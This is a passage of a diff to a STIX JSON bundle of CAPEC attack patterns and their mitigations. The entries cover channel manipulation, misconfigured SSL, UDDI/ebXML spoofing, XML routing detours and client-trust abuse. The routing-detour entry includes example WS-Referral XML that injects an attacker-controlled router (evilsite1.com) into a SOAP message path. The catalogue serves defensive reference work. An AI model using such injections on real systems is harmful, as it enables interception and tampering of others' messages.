"course-of-action--fd843d46-0f31-4616-8745-fb369be4acd4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9cb29d9c-a2fa-4593-a31b-95c1abdcfb35" + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--fead93cf-f25f-475f-a409-c228c017ab24", - "source_ref": "course-of-action--87996276-1f84-4c8a-9c08-db64c075c0d2", + "id": "relationship--cfb3d24c-1063-4fb7-b92d-fdf4f9fe78c6", + "source_ref": "course-of-action--15514f1d-6e2c-44fa-a059-2eb4d659c9a6", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9cb29d9c-a2fa-4593-a31b-95c1abdcfb35" + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--94550b4b-9c1b-42bb-b1e2-f8c161aed6ba", - "source_ref": "course-of-action--907647f4-0be0-4c8b-97ce-fa2ee30dfe3b", + "id": "relationship--0e134162-939b-4f1c-a3a7-2a4cd17e1a3f", + "source_ref": "course-of-action--4c39b271-b06b-45c4-89a8-b857142538bd", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9cb29d9c-a2fa-4593-a31b-95c1abdcfb35" + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--78141577-eedc-40e9-aa68-e4f6e20faaa7", - "source_ref": "course-of-action--f6a8baf9-61cb-4c81-a0b9-68d4c547815b", + "id": "relationship--f730b1cf-6be9-4267-83a3-bafb3298183d", + "source_ref": "course-of-action--c6168e3d-14cd-4b0d-95c7-84c53e4b0899", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9cb29d9c-a2fa-4593-a31b-95c1abdcfb35" + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ca712088-ca20-478d-99ab-762c0137f5dd", - "source_ref": "course-of-action--aec05bed-5ca5-45a4-bd38-611152294862", + "id": "relationship--26e72254-f7e5-44c2-8a3e-2a78d130b5c6", + "source_ref": "course-of-action--f010580e-dc07-4767-a265-30e908fb80a8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9cb29d9c-a2fa-4593-a31b-95c1abdcfb35" + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3c05f442-7aad-4693-a60f-fe9bd3ab4182", - "source_ref": "course-of-action--00c051c1-8f97-4b7c-9683-7478b3091e0f", + "id": "relationship--c6ec2d76-e409-4f47-b91d-f0c14c2f7e28", + "source_ref": "course-of-action--496c5a9c-3c8c-4887-a46a-6b3230ed0c06", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9cb29d9c-a2fa-4593-a31b-95c1abdcfb35" + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e543c5cf-199c-45f8-a088-2294eb5f94df", - "source_ref": "course-of-action--a4fc80ea-1622-4907-a825-226f0b2a14ee", + "id": "relationship--10170868-118d-40ea-8af2-5db1c1e3a7bd", + "source_ref": "course-of-action--3fb0274e-adc7-4bec-a0e9-8d6d208ae5e9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9cb29d9c-a2fa-4593-a31b-95c1abdcfb35" + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375" }, { "name": "Communication Channel Manipulation", "description": "An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -12002,65 +12126,66 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--9239258b-07e6-4cb3-a515-13ee9585b45d" + "id": "attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-216-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Encrypt all sensitive communications using properly-configured cryptography.", "type": "course-of-action", - "id": "course-of-action--cdd621e2-d3b6-4efc-ba56-5c34b177dcf7" + "id": "course-of-action--0c3b87ec-c44e-467b-8066-ee96dfcdfc80" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--44690683-1b04-4d51-a45e-0102767e99d6", - "source_ref": "course-of-action--cdd621e2-d3b6-4efc-ba56-5c34b177dcf7", + "id": "relationship--cb17feb8-6d17-4b8c-b451-c4c2747dfa9e", + "source_ref": "course-of-action--0c3b87ec-c44e-467b-8066-ee96dfcdfc80", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9239258b-07e6-4cb3-a515-13ee9585b45d" + "target_ref": "attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-216-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", "type": "course-of-action", - "id": "course-of-action--6432489f-1d69-4318-90e8-1cee8ab6d6a0" + "id": "course-of-action--7959d72d-654f-4b44-bc49-1ed26d35b1d2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4d5c14d3-abc9-4790-9f7c-0b9e0fd9dfe6", - "source_ref": "course-of-action--6432489f-1d69-4318-90e8-1cee8ab6d6a0", + "id": "relationship--f5a9f1e7-823a-4866-b736-cb4ae25c5ec8", + "source_ref": "course-of-action--7959d72d-654f-4b44-bc49-1ed26d35b1d2", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9239258b-07e6-4cb3-a515-13ee9585b45d" + "target_ref": "attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4" }, { "name": "Exploiting Incorrectly Configured SSL", "description": "An adversary takes advantage of incorrectly configured SSL communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2015-12-07T00:00:00.000Z", @@ -12103,40 +12228,41 @@ "Using MITM techniques, an attacker launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the attacker to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--27430ea2-cd1f-47f6-89bd-41dff2a0175d" + "id": "attack-pattern--5ad16d8c-e126-4a03-8931-e1f29523e1ee" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-12-07T00:00:00.000Z", "name": "coa-217-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Usage of configuration settings, such as stream ciphers vs. block ciphers and setting timeouts on SSL sessions to extremely low values lessens the potential impact. Use of later versions of TLS (e.g. TLS 1.1+) can also be effective, but not all clients or servers support the later versions.", "type": "course-of-action", - "id": "course-of-action--f5f7b92d-a04a-48d7-8d84-b0bcb55263f3" + "id": "course-of-action--4fd99982-ce00-4751-8e64-67f7257c25c4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-12-07T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c30b22d6-b19f-49be-95b2-b10fd81f8d63", - "source_ref": "course-of-action--f5f7b92d-a04a-48d7-8d84-b0bcb55263f3", + "id": "relationship--8220a682-70a9-4d9d-9099-97188386d650", + "source_ref": "course-of-action--4fd99982-ce00-4751-8e64-67f7257c25c4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--27430ea2-cd1f-47f6-89bd-41dff2a0175d" + "target_ref": "attack-pattern--5ad16d8c-e126-4a03-8931-e1f29523e1ee" }, { "name": "Spoofing of UDDI/ebXML Messages", "description": "An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -12161,40 +12287,41 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c61307c2-10d7-4f25-a963-fafc0677da5a" + "id": "attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-218-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party.", "type": "course-of-action", - "id": "course-of-action--5650538e-7157-4706-9567-802df872c05e" + "id": "course-of-action--f90235c8-6f81-4fd5-ba77-54ca17f00ffb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--03e4007f-20e7-40ae-aeac-115c9470de66", - "source_ref": "course-of-action--5650538e-7157-4706-9567-802df872c05e", + "id": "relationship--cd90abb4-18df-4f14-b008-5157c2b99f68", + "source_ref": "course-of-action--f90235c8-6f81-4fd5-ba77-54ca17f00ffb", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c61307c2-10d7-4f25-a963-fafc0677da5a" + "target_ref": "attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0" }, { "name": "XML Routing Detour Attacks", "description": "An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Man in the Middle type attacks. The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of his or her choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -12273,68 +12400,69 @@ "\n Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction).\n \n Example SOAP message with routing information in header:\n <S:Envelope> <S:Header> <m:path xmlns:m=\"http://schemas.example.com/rp/\" S:actor=\"http://schemas.example.com/soap/actor\" S:mustUnderstand=\"1\"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>\n Add an additional node (example3.com/router) to the XML path in a WS-Referral message\n <r:ref xmlns:r=\"http://schemas.example.com/referral\"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://example3.com/router</r:via> </r:go> </r:ref>\n \n \n Resulting in the following SOAP Header:<S:Envelope> <S:Header> <m:path xmlns:m=\"http://schemas.example.com/rp/\" S:actor=\"http://schemas.example.com/soap/actor\" S:mustUnderstand=\"1\"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body>...</S:Body> </S:Envelope>\n In the following example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that he/she has targeted.\n \n Example of WS-Referral based WS-Routing injection of the bogus node route:<r:ref xmlns:r=\"http://schemas.example.com/referral\"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://evilsite1.com/router</r:via> </r:go> </r:ref>\n \n Resulting XML Routing Detour attack:<S:Envelope> <S:Header> <m:path xmlns:m=\"http://schemas.example.com/rp/\" S:actor=\"http://schemas.example.com/soap/actor\" S:mustUnderstand=\"1\"> <m:action>http://example_0.com/</m:action> <m:to>http://example_4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://evilesite1.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>\n Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c7705fa2-b954-4013-9463-92c2ed4a37b8" + "id": "attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-219-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.", "type": "course-of-action", - "id": "course-of-action--f9721f68-8556-4fef-aa3b-adfc961c0eae" + "id": "course-of-action--c148e0e3-6776-4412-a22d-fe0ab64e3107" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3eb31dbf-e899-46b9-828b-a3ea46b80ae1", - "source_ref": "course-of-action--f9721f68-8556-4fef-aa3b-adfc961c0eae", + "id": "relationship--795d43b4-83aa-41d3-8265-230037287312", + "source_ref": "course-of-action--c148e0e3-6776-4412-a22d-fe0ab64e3107", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c7705fa2-b954-4013-9463-92c2ed4a37b8" + "target_ref": "attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-219-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use SSL for connections between all parties with mutual authentication.", "type": "course-of-action", - "id": "course-of-action--b9a7ff60-6d8a-4acb-a496-9bab78507c26" + "id": "course-of-action--d6e6bdf1-4cf0-47dd-bc63-891dfd4e3d9e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6b152b6a-e91c-4efd-8529-203ea58dcc9a", - "source_ref": "course-of-action--b9a7ff60-6d8a-4acb-a496-9bab78507c26", + "id": "relationship--47d20968-0f5f-4c61-a962-fc2245126384", + "source_ref": "course-of-action--d6e6bdf1-4cf0-47dd-bc63-891dfd4e3d9e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c7705fa2-b954-4013-9463-92c2ed4a37b8" + "target_ref": "attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926" }, { "name": "Exploiting Trust in Client", - "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -12410,128 +12538,129 @@ "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--be014d69-3d57-4c22-b2a1-a053dead702d" + "id": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-22-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.", "type": "course-of-action", - "id": "course-of-action--1d0d97d4-729a-4cbd-90b9-d96851373df1" + "id": "course-of-action--875b6de8-e5e7-4952-9130-4fe457a29e60" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b1222ab8-071c-49f9-9f4a-128ec4045ebc", - "source_ref": "course-of-action--1d0d97d4-729a-4cbd-90b9-d96851373df1", + "id": "relationship--f578d9fb-fe71-48f7-8fbb-d45167ed1846", + "source_ref": "course-of-action--875b6de8-e5e7-4952-9130-4fe457a29e60", "relationship_type": "mitigates", - "target_ref": "attack-pattern--be014d69-3d57-4c22-b2a1-a053dead702d" + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-22-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Do not rely on client validation or encoding for security purposes.", "type": "course-of-action", - "id": "course-of-action--51105b35-f9f9-4cfc-b0df-41d3f4ac93ac" + "id": "course-of-action--17b27433-058d-4611-8ea1-bf410322ede5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--71d77bc7-1df4-44e8-a3e8-01de3ff1fadc", - "source_ref": "course-of-action--51105b35-f9f9-4cfc-b0df-41d3f4ac93ac", + "id": "relationship--07f3d0eb-4e5a-4e95-aceb-2c1da8b29934", + "source_ref": "course-of-action--17b27433-058d-4611-8ea1-bf410322ede5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--be014d69-3d57-4c22-b2a1-a053dead702d" + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-22-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Utilize digital signatures to increase authentication assurance.", "type": "course-of-action", - "id": "course-of-action--d571e9e1-3996-424c-b8a1-18f767198f84" + "id": "course-of-action--aa59f657-f598-4b2e-969a-fc688eb3fa2b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--99117637-652d-4e9a-a226-11dad3d7c4f2", - "source_ref": "course-of-action--d571e9e1-3996-424c-b8a1-18f767198f84", + "id": "relationship--9304375a-3ec0-4ab2-9134-a129993052b6", + "source_ref": "course-of-action--aa59f657-f598-4b2e-969a-fc688eb3fa2b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--be014d69-3d57-4c22-b2a1-a053dead702d" + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-22-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Utilize two factor authentication to increase authentication assurance.", "type": "course-of-action", - "id": 